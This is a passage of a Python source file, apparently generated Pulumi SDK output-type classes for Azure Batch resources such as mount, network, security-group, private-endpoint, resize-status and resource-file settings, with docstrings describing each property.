            pulumi.set(__self__, "key_identifier", key_identifier)

    @property
    @pulumi.getter(name="keyIdentifier")
    def key_identifier(self) -> Optional[str]:
        """
        Full path to the versioned secret; see the constructor docs for prerequisites.
        """
        return pulumi.get(self, "key_identifier")
@pulumi.output_type
class KeyVaultReferenceResponse(dict):
    """
    Identifies the Azure key vault associated with a Batch account.
    """
    def __init__(__self__, *,
                 id: str,
                 url: str):
        """
        Identifies the Azure key vault associated with a Batch account.

        :param str id: The resource ID of the Azure key vault associated with the Batch account.
        :param str url: The URL of the Azure key vault associated with the Batch account.
        """
        # Both fields are required, so store them unconditionally.
        for prop_name, prop_value in (("id", id), ("url", url)):
            pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The resource ID of the Azure key vault associated with the Batch account.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def url(self) -> str:
        """
        The URL of the Azure key vault associated with the Batch account.
        """
        return pulumi.get(self, "url")
@pulumi.output_type
class LinuxUserConfigurationResponse(dict):
    """
    User account settings (uid, gid, SSH private key) for Linux nodes.
    """
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys mapped to their snake_case property names.
        renamed = {
            "sshPrivateKey": "ssh_private_key",
        }
        suggest = renamed.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in LinuxUserConfigurationResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        LinuxUserConfigurationResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        LinuxUserConfigurationResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 gid: Optional[int] = None,
                 ssh_private_key: Optional[str] = None,
                 uid: Optional[int] = None):
        """
        :param int gid: The uid and gid properties must be specified together or not at
            all. If not specified, the underlying operating system picks the gid.
        :param str ssh_private_key: Must not be password protected. Used to configure
            asymmetric-key SSH between nodes in a Linux pool when the pool's
            enableInterNodeCommunication is true (ignored otherwise) by placing the key
            pair into the user's .ssh directory. If not specified, password-less SSH is
            not configured between nodes (the user's .ssh directory is left untouched).
        :param int uid: The uid and gid properties must be specified together or not at
            all. If not specified, the underlying operating system picks the uid.
        """
        # Every field is optional; persist only those that were supplied.
        for prop_name, prop_value in (
            ("gid", gid),
            ("ssh_private_key", ssh_private_key),
            ("uid", uid),
        ):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def gid(self) -> Optional[int]:
        """
        Group id; must be specified together with uid or not at all. If omitted the
        underlying operating system picks the gid.
        """
        return pulumi.get(self, "gid")

    @property
    @pulumi.getter(name="sshPrivateKey")
    def ssh_private_key(self) -> Optional[str]:
        """
        Unprotected SSH private key used for password-less SSH between nodes when the
        pool's enableInterNodeCommunication is true; see the constructor docs.
        """
        return pulumi.get(self, "ssh_private_key")

    @property
    @pulumi.getter
    def uid(self) -> Optional[int]:
        """
        User id; must be specified together with gid or not at all. If omitted the
        underlying operating system picks the uid.
        """
        return pulumi.get(self, "uid")
@pulumi.output_type
class MetadataItemResponse(dict):
    """
    A name/value metadata pair. The Batch service does not assign any meaning to
    this metadata; it is solely for the use of user code.
    """
    def __init__(__self__, *,
                 name: str,
                 value: str):
        """
        :param str name: The metadata name.
        :param str value: The metadata value.
        """
        # Both fields are required, so store them unconditionally.
        for prop_name, prop_value in (("name", name), ("value", value)):
            pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def name(self) -> str:
        """The metadata name."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def value(self) -> str:
        """The metadata value."""
        return pulumi.get(self, "value")
@pulumi.output_type
class MountConfigurationResponse(dict):
    """
    A file-system mount for pool nodes; exactly one of the configuration
    properties should be set (each is mutually exclusive with the others).
    """
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys mapped to their snake_case property names.
        renamed = {
            "azureBlobFileSystemConfiguration": "azure_blob_file_system_configuration",
            "azureFileShareConfiguration": "azure_file_share_configuration",
            "cifsMountConfiguration": "cifs_mount_configuration",
            "nfsMountConfiguration": "nfs_mount_configuration",
        }
        suggest = renamed.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in MountConfigurationResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        MountConfigurationResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        MountConfigurationResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 azure_blob_file_system_configuration: Optional['outputs.AzureBlobFileSystemConfigurationResponse'] = None,
                 azure_file_share_configuration: Optional['outputs.AzureFileShareConfigurationResponse'] = None,
                 cifs_mount_configuration: Optional['outputs.CIFSMountConfigurationResponse'] = None,
                 nfs_mount_configuration: Optional['outputs.NFSMountConfigurationResponse'] = None):
        """
        :param 'AzureBlobFileSystemConfigurationResponse' azure_blob_file_system_configuration: Mutually exclusive with all other properties.
        :param 'AzureFileShareConfigurationResponse' azure_file_share_configuration: Mutually exclusive with all other properties.
        :param 'CIFSMountConfigurationResponse' cifs_mount_configuration: Mutually exclusive with all other properties.
        :param 'NFSMountConfigurationResponse' nfs_mount_configuration: Mutually exclusive with all other properties.
        """
        # Persist only the configuration that was actually provided.
        for prop_name, prop_value in (
            ("azure_blob_file_system_configuration", azure_blob_file_system_configuration),
            ("azure_file_share_configuration", azure_file_share_configuration),
            ("cifs_mount_configuration", cifs_mount_configuration),
            ("nfs_mount_configuration", nfs_mount_configuration),
        ):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="azureBlobFileSystemConfiguration")
    def azure_blob_file_system_configuration(self) -> Optional['outputs.AzureBlobFileSystemConfigurationResponse']:
        """
        This property is mutually exclusive with all other properties.
        """
        return pulumi.get(self, "azure_blob_file_system_configuration")

    @property
    @pulumi.getter(name="azureFileShareConfiguration")
    def azure_file_share_configuration(self) -> Optional['outputs.AzureFileShareConfigurationResponse']:
        """
        This property is mutually exclusive with all other properties.
        """
        return pulumi.get(self, "azure_file_share_configuration")

    @property
    @pulumi.getter(name="cifsMountConfiguration")
    def cifs_mount_configuration(self) -> Optional['outputs.CIFSMountConfigurationResponse']:
        """
        This property is mutually exclusive with all other properties.
        """
        return pulumi.get(self, "cifs_mount_configuration")

    @property
    @pulumi.getter(name="nfsMountConfiguration")
    def nfs_mount_configuration(self) -> Optional['outputs.NFSMountConfigurationResponse']:
        """
        This property is mutually exclusive with all other properties.
        """
        return pulumi.get(self, "nfs_mount_configuration")
@pulumi.output_type
class NFSMountConfigurationResponse(dict):
    """
    NFS mount settings for pool nodes.
    """
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys mapped to their snake_case property names.
        renamed = {
            "relativeMountPath": "relative_mount_path",
            "mountOptions": "mount_options",
        }
        suggest = renamed.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in NFSMountConfigurationResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        NFSMountConfigurationResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        NFSMountConfigurationResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 relative_mount_path: str,
                 source: str,
                 mount_options: Optional[str] = None):
        """
        :param str relative_mount_path: All file systems are mounted relative to the
            Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR
            environment variable.
        :param str source: The source of the file system to mount.
        :param str mount_options: These are 'net use' options in Windows and 'mount'
            options in Linux.
        """
        # Required fields first ...
        for prop_name, prop_value in (
            ("relative_mount_path", relative_mount_path),
            ("source", source),
        ):
            pulumi.set(__self__, prop_name, prop_value)
        # ... then the optional mount options, persisted only when supplied.
        if mount_options is not None:
            pulumi.set(__self__, "mount_options", mount_options)

    @property
    @pulumi.getter(name="relativeMountPath")
    def relative_mount_path(self) -> str:
        """
        All file systems are mounted relative to the Batch mounts directory,
        accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
        """
        return pulumi.get(self, "relative_mount_path")

    @property
    @pulumi.getter
    def source(self) -> str:
        """The source of the file system to mount."""
        return pulumi.get(self, "source")

    @property
    @pulumi.getter(name="mountOptions")
    def mount_options(self) -> Optional[str]:
        """
        These are 'net use' options in Windows and 'mount' options in Linux.
        """
        return pulumi.get(self, "mount_options")
@pulumi.output_type
class NetworkConfigurationResponse(dict):
    """
    The network configuration for a pool.
    """
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys mapped to their snake_case property names.
        renamed = {
            "endpointConfiguration": "endpoint_configuration",
            "publicIPAddressConfiguration": "public_ip_address_configuration",
            "subnetId": "subnet_id",
        }
        suggest = renamed.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in NetworkConfigurationResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        NetworkConfigurationResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        NetworkConfigurationResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 endpoint_configuration: Optional['outputs.PoolEndpointConfigurationResponse'] = None,
                 public_ip_address_configuration: Optional['outputs.PublicIPAddressConfigurationResponse'] = None,
                 subnet_id: Optional[str] = None):
        """
        The network configuration for a pool.

        :param 'PoolEndpointConfigurationResponse' endpoint_configuration: Only
            supported on pools with the virtualMachineConfiguration property.
        :param 'PublicIPAddressConfigurationResponse' public_ip_address_configuration:
            Only supported on pools with the virtualMachineConfiguration property.
        :param str subnet_id: Virtual network subnet for the pool's nodes. The VNet
            must be in the same region and subscription as the Batch account, and the
            subnet must have enough free IP addresses for the pool (otherwise nodes are
            partially allocated and a resize error occurs). The 'MicrosoftAzureBatch'
            service principal needs the 'Classic Virtual Machine Contributor' RBAC role
            on the VNet, and any associated NSGs must allow Batch service communication:
            for virtualMachineConfiguration pools enable ports 29876 and 29877 plus 22
            (Linux) or 3389 (Windows); for cloudServiceConfiguration pools enable ports
            10100, 20100 and 30100; also allow outbound Azure Storage on port 443.
            cloudServiceConfiguration pools support only 'classic' VNets. See
            https://docs.microsoft.com/en-us/azure/batch/batch-api-basics#virtual-network-vnet-and-firewall-configuration
        """
        # All settings are optional; persist only the ones that were supplied.
        for prop_name, prop_value in (
            ("endpoint_configuration", endpoint_configuration),
            ("public_ip_address_configuration", public_ip_address_configuration),
            ("subnet_id", subnet_id),
        ):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="endpointConfiguration")
    def endpoint_configuration(self) -> Optional['outputs.PoolEndpointConfigurationResponse']:
        """
        Pool endpoint configuration is only supported on pools with the
        virtualMachineConfiguration property.
        """
        return pulumi.get(self, "endpoint_configuration")

    @property
    @pulumi.getter(name="publicIPAddressConfiguration")
    def public_ip_address_configuration(self) -> Optional['outputs.PublicIPAddressConfigurationResponse']:
        """
        This property is only supported on Pools with the virtualMachineConfiguration
        property.
        """
        return pulumi.get(self, "public_ip_address_configuration")

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[str]:
        """
        Virtual network subnet for the pool's nodes; see the constructor docs for the
        full region, subscription, RBAC and NSG-port requirements.
        """
        return pulumi.get(self, "subnet_id")
@pulumi.output_type
class NetworkSecurityGroupRuleResponse(dict):
    """
    A network security group rule applied to an inbound endpoint.
    """
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys mapped to their snake_case property names.
        renamed = {
            "sourceAddressPrefix": "source_address_prefix",
            "sourcePortRanges": "source_port_ranges",
        }
        suggest = renamed.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in NetworkSecurityGroupRuleResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        NetworkSecurityGroupRuleResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        NetworkSecurityGroupRuleResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 access: str,
                 priority: int,
                 source_address_prefix: str,
                 source_port_ranges: Optional[Sequence[str]] = None):
        """
        :param str access: The action taken for a matching rule.
        :param int priority: Priorities within a pool must be unique and are evaluated
            in order of priority; the lower the number the higher the priority (e.g. a
            rule at 150 takes precedence over one at 250). Allowed priorities are 150 to
            4096. Reserved or duplicate values make the request fail with HTTP 400.
        :param str source_address_prefix: A single IP address (i.e. 10.10.10.10), IP
            subnet (i.e. 192.168.1.0/24), default tag, or * (for all addresses). Any
            other value makes the request fail with HTTP 400.
        :param Sequence[str] source_port_ranges: '*' (for all ports 0 - 65535) or
            arrays of ports or port ranges (i.e. 100-200) within 0 to 65535; ranges and
            ports must not overlap. Any other value makes the request fail with HTTP
            400. Default value will be *.
        """
        # Required fields first ...
        for prop_name, prop_value in (
            ("access", access),
            ("priority", priority),
            ("source_address_prefix", source_address_prefix),
        ):
            pulumi.set(__self__, prop_name, prop_value)
        # ... then the optional port ranges, persisted only when supplied.
        if source_port_ranges is not None:
            pulumi.set(__self__, "source_port_ranges", source_port_ranges)

    @property
    @pulumi.getter
    def access(self) -> str:
        """The action taken for a matching rule."""
        return pulumi.get(self, "access")

    @property
    @pulumi.getter
    def priority(self) -> int:
        """
        Unique rule priority within the pool, 150 to 4096; lower numbers win. See the
        constructor docs for details.
        """
        return pulumi.get(self, "priority")

    @property
    @pulumi.getter(name="sourceAddressPrefix")
    def source_address_prefix(self) -> str:
        """
        A single IP address, IP subnet, default tag, or * (for all addresses). Other
        values make the request fail with HTTP status code 400.
        """
        return pulumi.get(self, "source_address_prefix")

    @property
    @pulumi.getter(name="sourcePortRanges")
    def source_port_ranges(self) -> Optional[Sequence[str]]:
        """
        '*' or arrays of non-overlapping ports/port ranges within 0 to 65535; defaults
        to *. Other values make the request fail with HTTP status code 400.
        """
        return pulumi.get(self, "source_port_ranges")
@pulumi.output_type
class NodePlacementConfigurationResponse(dict):
    """
    Allocation configuration used by Batch Service to provision the nodes.
    """
    def __init__(__self__, *,
                 policy: Optional[str] = None):
        """
        Allocation configuration used by Batch Service to provision the nodes.

        :param str policy: Allocation policy used by Batch Service to provision the
            nodes. If not specified, Batch will use the regional policy.
        """
        if policy is None:
            # Nothing supplied: the service falls back to the regional policy.
            return
        pulumi.set(__self__, "policy", policy)

    @property
    @pulumi.getter
    def policy(self) -> Optional[str]:
        """
        Allocation policy used by Batch Service to provision the nodes. If not
        specified, Batch will use the regional policy.
        """
        return pulumi.get(self, "policy")
@pulumi.output_type
class PoolEndpointConfigurationResponse(dict):
    """
    The endpoint configuration for a pool.
    """
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys mapped to their snake_case property names.
        renamed = {
            "inboundNatPools": "inbound_nat_pools",
        }
        suggest = renamed.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in PoolEndpointConfigurationResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        PoolEndpointConfigurationResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        PoolEndpointConfigurationResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 inbound_nat_pools: Sequence['outputs.InboundNatPoolResponse']):
        """
        :param Sequence['InboundNatPoolResponse'] inbound_nat_pools: The maximum number
            of inbound NAT pools per Batch pool is 5; exceeding it makes the request
            fail with HTTP status code 400. Cannot be specified if the
            IPAddressProvisioningType is NoPublicIPAddresses.
        """
        pulumi.set(__self__, "inbound_nat_pools", inbound_nat_pools)

    @property
    @pulumi.getter(name="inboundNatPools")
    def inbound_nat_pools(self) -> Sequence['outputs.InboundNatPoolResponse']:
        """
        The maximum number of inbound NAT pools per Batch pool is 5. If the maximum
        number of inbound NAT pools is exceeded the request fails with HTTP status code
        400. This cannot be specified if the IPAddressProvisioningType is
        NoPublicIPAddresses.
        """
        return pulumi.get(self, "inbound_nat_pools")
@pulumi.output_type
class PrivateEndpointConnectionResponse(dict):
    """
    Contains information about a private link resource.
    """
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys mapped to their snake_case property names.
        renamed = {
            "provisioningState": "provisioning_state",
            "privateEndpoint": "private_endpoint",
            "privateLinkServiceConnectionState": "private_link_service_connection_state",
        }
        suggest = renamed.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in PrivateEndpointConnectionResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        PrivateEndpointConnectionResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        PrivateEndpointConnectionResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 etag: str,
                 id: str,
                 name: str,
                 provisioning_state: str,
                 type: str,
                 private_endpoint: Optional['outputs.PrivateEndpointResponse'] = None,
                 private_link_service_connection_state: Optional['outputs.PrivateLinkServiceConnectionStateResponse'] = None):
        """
        Contains information about a private link resource.

        :param str etag: The ETag of the resource, used for concurrency statements.
        :param str id: The ID of the resource.
        :param str name: The name of the resource.
        :param str provisioning_state: The provisioning state of the connection.
        :param str type: The type of the resource.
        :param 'PrivateEndpointResponse' private_endpoint: The private endpoint of the
            private endpoint connection.
        :param 'PrivateLinkServiceConnectionStateResponse' private_link_service_connection_state:
            The private link service connection state of the private endpoint connection
        """
        # Required fields first ...
        for prop_name, prop_value in (
            ("etag", etag),
            ("id", id),
            ("name", name),
            ("provisioning_state", provisioning_state),
            ("type", type),
        ):
            pulumi.set(__self__, prop_name, prop_value)
        # ... then the optional ones, persisted only when supplied.
        if private_endpoint is not None:
            pulumi.set(__self__, "private_endpoint", private_endpoint)
        if private_link_service_connection_state is not None:
            pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)

    @property
    @pulumi.getter
    def etag(self) -> str:
        """
        The ETag of the resource, used for concurrency statements.
        """
        return pulumi.get(self, "etag")

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The ID of the resource.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        The name of the resource.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> str:
        """The provisioning state of the private endpoint connection."""
        return pulumi.get(self, "provisioning_state")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        The type of the resource.
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter(name="privateEndpoint")
    def private_endpoint(self) -> Optional['outputs.PrivateEndpointResponse']:
        """
        The private endpoint of the private endpoint connection.
        """
        return pulumi.get(self, "private_endpoint")

    @property
    @pulumi.getter(name="privateLinkServiceConnectionState")
    def private_link_service_connection_state(self) -> Optional['outputs.PrivateLinkServiceConnectionStateResponse']:
        """
        The private link service connection state of the private endpoint connection
        """
        return pulumi.get(self, "private_link_service_connection_state")
@pulumi.output_type
class PrivateEndpointResponse(dict):
    """
    The private endpoint of the private endpoint connection.
    """
    def __init__(__self__, *,
                 id: str):
        """
        The private endpoint of the private endpoint connection.

        :param str id: The ID of the private endpoint resource.
        """
        pulumi.set(__self__, "id", id)
    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The ID of the private endpoint resource.
        """
        return pulumi.get(self, "id")
@pulumi.output_type
class PrivateLinkServiceConnectionStateResponse(dict):
    """
    The private link service connection state of the private endpoint connection
    """
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys mapped to their snake_case property names.
        renamed = {
            "actionRequired": "action_required",
        }
        suggest = renamed.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in PrivateLinkServiceConnectionStateResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        PrivateLinkServiceConnectionStateResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        PrivateLinkServiceConnectionStateResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 action_required: str,
                 status: str,
                 description: Optional[str] = None):
        """
        The private link service connection state of the private endpoint connection

        :param str action_required: Action required for the connection, as reported by
            the service.
        :param str status: The status of the connection.
        :param str description: Optional description of the connection state.
        """
        # Required fields first ...
        for prop_name, prop_value in (
            ("action_required", action_required),
            ("status", status),
        ):
            pulumi.set(__self__, prop_name, prop_value)
        # ... then the optional description, persisted only when supplied.
        if description is not None:
            pulumi.set(__self__, "description", description)

    @property
    @pulumi.getter(name="actionRequired")
    def action_required(self) -> str:
        """Action required for the connection, as reported by the service."""
        return pulumi.get(self, "action_required")

    @property
    @pulumi.getter
    def status(self) -> str:
        """The status of the connection."""
        return pulumi.get(self, "status")

    @property
    @pulumi.getter
    def description(self) -> Optional[str]:
        """Optional description of the connection state."""
        return pulumi.get(self, "description")
@pulumi.output_type
class PublicIPAddressConfigurationResponse(dict):
    """
    The public IP Address configuration of the networking configuration of a Pool.
    """
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys mapped to their snake_case property names.
        renamed = {
            "ipAddressIds": "ip_address_ids",
        }
        suggest = renamed.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in PublicIPAddressConfigurationResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        PublicIPAddressConfigurationResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        PublicIPAddressConfigurationResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 ip_address_ids: Optional[Sequence[str]] = None,
                 provision: Optional[str] = None):
        """
        The public IP Address configuration of the networking configuration of a Pool.

        :param Sequence[str] ip_address_ids: The number of IPs specified here limits
            the maximum size of the Pool - 100 dedicated nodes or 100 low-priority nodes
            can be allocated for each public IP (e.g. a pool needing 250 dedicated VMs
            needs at least 3 public IPs). Each element is of the form:
            /subscriptions/{subscription}/resourceGroups/{group}/providers/Microsoft.Network/publicIPAddresses/{ip}.
        :param str provision: The default value is BatchManaged
        """
        # Both settings are optional; persist only those that were supplied.
        for prop_name, prop_value in (
            ("ip_address_ids", ip_address_ids),
            ("provision", provision),
        ):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="ipAddressIds")
    def ip_address_ids(self) -> Optional[Sequence[str]]:
        """
        Public IP resource IDs; the count limits the maximum pool size (100 dedicated
        or 100 low-priority nodes per IP). See the constructor docs for the ID format.
        """
        return pulumi.get(self, "ip_address_ids")

    @property
    @pulumi.getter
    def provision(self) -> Optional[str]:
        """
        The default value is BatchManaged
        """
        return pulumi.get(self, "provision")
@pulumi.output_type
class ResizeErrorResponse(dict):
    """
    An error reported for a pool resize operation, possibly with nested details.
    """
    def __init__(__self__, *,
                 code: str,
                 message: str,
                 details: Optional[Sequence['outputs.ResizeErrorResponse']] = None):
        """
        :param str code: An identifier for the error. Codes are invariant and are
            intended to be consumed programmatically.
        :param str message: A message describing the error, intended to be suitable for
            display in a user interface.
        :param Sequence['ResizeErrorResponse'] details: Optional nested errors with
            additional detail.
        """
        # Required fields first ...
        for prop_name, prop_value in (("code", code), ("message", message)):
            pulumi.set(__self__, prop_name, prop_value)
        # ... then the optional nested details, persisted only when supplied.
        if details is not None:
            pulumi.set(__self__, "details", details)

    @property
    @pulumi.getter
    def code(self) -> str:
        """
        An identifier for the error. Codes are invariant and are intended to be
        consumed programmatically.
        """
        return pulumi.get(self, "code")

    @property
    @pulumi.getter
    def message(self) -> str:
        """
        A message describing the error, intended to be suitable for display in a user
        interface.
        """
        return pulumi.get(self, "message")

    @property
    @pulumi.getter
    def details(self) -> Optional[Sequence['outputs.ResizeErrorResponse']]:
        """Optional nested errors with additional detail."""
        return pulumi.get(self, "details")
@pulumi.output_type
class ResizeOperationStatusResponse(dict):
    """
    Describes either the current operation (if the pool AllocationState is Resizing) or the previously completed operation (if the AllocationState is Steady).
    """
    @staticmethod
    def __key_warning(key: str):
        # Wire (camelCase) key -> snake_case property getter name.
        camel_to_snake = {
            "nodeDeallocationOption": "node_deallocation_option",
            "resizeTimeout": "resize_timeout",
            "startTime": "start_time",
            "targetDedicatedNodes": "target_dedicated_nodes",
            "targetLowPriorityNodes": "target_low_priority_nodes",
        }
        suggest = camel_to_snake.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in ResizeOperationStatusResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        ResizeOperationStatusResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        ResizeOperationStatusResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 errors: Optional[Sequence['outputs.ResizeErrorResponse']] = None,
                 node_deallocation_option: Optional[str] = None,
                 resize_timeout: Optional[str] = None,
                 start_time: Optional[str] = None,
                 target_dedicated_nodes: Optional[int] = None,
                 target_low_priority_nodes: Optional[int] = None):
        """
        Describes either the current operation (if the pool AllocationState is Resizing) or the previously completed operation (if the AllocationState is Steady).
        :param Sequence['ResizeErrorResponse'] errors: This property is set only if an error occurred during the last pool resize, and only when the pool allocationState is Steady.
        :param str node_deallocation_option: The default value is requeue.
        :param str resize_timeout: The default value is 15 minutes. The minimum value is 5 minutes. If you specify a value less than 5 minutes, the Batch service returns an error; if you are calling the REST API directly, the HTTP status code is 400 (Bad Request).
        """
        # Every constructor argument is optional; only the ones that were
        # actually supplied get stored on the output object.
        optional_props = (
            ("errors", errors),
            ("node_deallocation_option", node_deallocation_option),
            ("resize_timeout", resize_timeout),
            ("start_time", start_time),
            ("target_dedicated_nodes", target_dedicated_nodes),
            ("target_low_priority_nodes", target_low_priority_nodes),
        )
        for prop_name, prop_value in optional_props:
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def errors(self) -> Optional[Sequence['outputs.ResizeErrorResponse']]:
        """
        This property is set only if an error occurred during the last pool resize, and only when the pool allocationState is Steady.
        """
        return pulumi.get(self, "errors")

    @property
    @pulumi.getter(name="nodeDeallocationOption")
    def node_deallocation_option(self) -> Optional[str]:
        """
        The default value is requeue.
        """
        return pulumi.get(self, "node_deallocation_option")

    @property
    @pulumi.getter(name="resizeTimeout")
    def resize_timeout(self) -> Optional[str]:
        """
        The default value is 15 minutes. The minimum value is 5 minutes. If you specify a value less than 5 minutes, the Batch service returns an error; if you are calling the REST API directly, the HTTP status code is 400 (Bad Request).
        """
        return pulumi.get(self, "resize_timeout")

    @property
    @pulumi.getter(name="startTime")
    def start_time(self) -> Optional[str]:
        return pulumi.get(self, "start_time")

    @property
    @pulumi.getter(name="targetDedicatedNodes")
    def target_dedicated_nodes(self) -> Optional[int]:
        return pulumi.get(self, "target_dedicated_nodes")

    @property
    @pulumi.getter(name="targetLowPriorityNodes")
    def target_low_priority_nodes(self) -> Optional[int]:
        return pulumi.get(self, "target_low_priority_nodes")
@pulumi.output_type
class ResourceFileResponse(dict):
    @staticmethod
    def __key_warning(key: str):
        # Wire (camelCase) key -> snake_case property getter name.
        camel_to_snake = {
            "autoStorageContainerName": "auto_storage_container_name",
            "blobPrefix": "blob_prefix",
            "fileMode": "file_mode",
            "filePath": "file_path",
            "httpUrl": "http_url",
            "storageContainerUrl": "storage_container_url",
        }
        suggest = camel_to_snake.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in ResourceFileResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        ResourceFileResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        ResourceFileResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 auto_storage_container_name: Optional[str] = None,
                 blob_prefix: Optional[str] = None,
                 file_mode: Optional[str] = None,
                 file_path: Optional[str] = None,
                 http_url: Optional[str] = None,
                 storage_container_url: Optional[str] = None):
        """
        :param str auto_storage_container_name: The autoStorageContainerName, storageContainerUrl and httpUrl properties are mutually exclusive and one of them must be specified.
        :param str blob_prefix: The property is valid only when autoStorageContainerName or storageContainerUrl is used. This prefix can be a partial filename or a subdirectory. If a prefix is not specified, all the files in the container will be downloaded.
        :param str file_mode: This property applies only to files being downloaded to Linux compute nodes. It will be ignored if it is specified for a resourceFile which will be downloaded to a Windows node. If this property is not specified for a Linux node, then a default value of 0770 is applied to the file.
        :param str file_path: If the httpUrl property is specified, the filePath is required and describes the path which the file will be downloaded to, including the filename. Otherwise, if the autoStorageContainerName or storageContainerUrl property is specified, filePath is optional and is the directory to download the files to. In the case where filePath is used as a directory, any directory structure already associated with the input data will be retained in full and appended to the specified filePath directory. The specified relative path cannot break out of the task's working directory (for example by using '..').
        :param str http_url: The autoStorageContainerName, storageContainerUrl and httpUrl properties are mutually exclusive and one of them must be specified. If the URL is Azure Blob Storage, it must be readable using anonymous access; that is, the Batch service does not present any credentials when downloading the blob. There are two ways to get such a URL for a blob in Azure storage: include a Shared Access Signature (SAS) granting read permissions on the blob, or set the ACL for the blob or its container to allow public access.
        :param str storage_container_url: The autoStorageContainerName, storageContainerUrl and httpUrl properties are mutually exclusive and one of them must be specified. This URL must be readable and listable using anonymous access; that is, the Batch service does not present any credentials when downloading the blob. There are two ways to get such a URL for a blob in Azure storage: include a Shared Access Signature (SAS) granting read and list permissions on the blob, or set the ACL for the blob or its container to allow public access.
        """
        # Every constructor argument is optional; only the ones that were
        # actually supplied get stored on the output object.
        optional_props = (
            ("auto_storage_container_name", auto_storage_container_name),
            ("blob_prefix", blob_prefix),
            ("file_mode", file_mode),
            ("file_path", file_path),
            ("http_url", http_url),
            ("storage_container_url", storage_container_url),
        )
        for prop_name, prop_value in optional_props:
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
